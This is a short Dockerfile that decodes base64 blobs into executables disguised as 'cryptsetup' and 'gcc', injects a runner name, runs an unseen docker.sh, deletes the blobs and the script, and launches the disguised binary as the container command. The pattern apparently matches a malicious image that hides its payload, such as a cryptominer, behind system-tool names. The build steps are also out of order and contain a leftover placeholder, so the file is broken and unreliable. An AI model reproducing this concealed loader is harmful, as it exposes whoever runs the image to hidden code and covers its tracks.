FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > cryptsetup.log'
RUN base64 --decode cryptsetup.64 > cryptsetup
RUN base64 --decode gcc.64 > gcc
RUN chmod +x gcc

COPY cryptsetup .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' cryptsetup
RUN bash ./docker.sh
RUN rm --force --recursive cryptsetup _REPO_NAME__.64 docker.sh gcc gcc.64

CMD cryptsetup
